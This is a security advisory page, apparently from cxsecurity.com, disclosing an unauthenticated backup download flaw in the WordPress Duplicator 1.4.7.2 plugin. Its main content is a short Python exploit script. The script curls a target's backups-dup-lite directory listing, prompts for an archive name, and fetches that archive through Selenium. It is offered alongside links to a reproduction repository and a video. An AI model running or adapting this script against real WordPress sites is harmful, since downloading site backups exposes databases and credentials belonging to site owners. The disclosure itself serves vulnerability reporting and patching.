WordPress Duplicator 1.4.7.2 Backup Disclosure

2022.08.23
Credit: nu11secur1ty
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download ## Author: nu11secur1ty ## Date: 08.23.2022 ## Vendor: https://wordpress.org/ ## Software: https://wordpress.org/plugins/duplicator/ ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2 ## Description: The WordPress Plugin Duplicator 1.4.7.2 suffers from Unauthenticated Backup Download, after an update from the 1.4.7.1 version. The attacker can download all archive information from the system by using this vulnerability! Status: CRITICAL [+] Exploit: ```python #!/usr/bin/python # Author nu11secur1ty from selenium import webdriver import time import os print("Test if you can access the directory\n") time.sleep(5) os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/') target=input("Give the name of the archive...\n") driver = webdriver.Chrome() driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/' + target) ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2) ## Proof and Exploit: [href](https://streamable.com/x0cvjh)


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top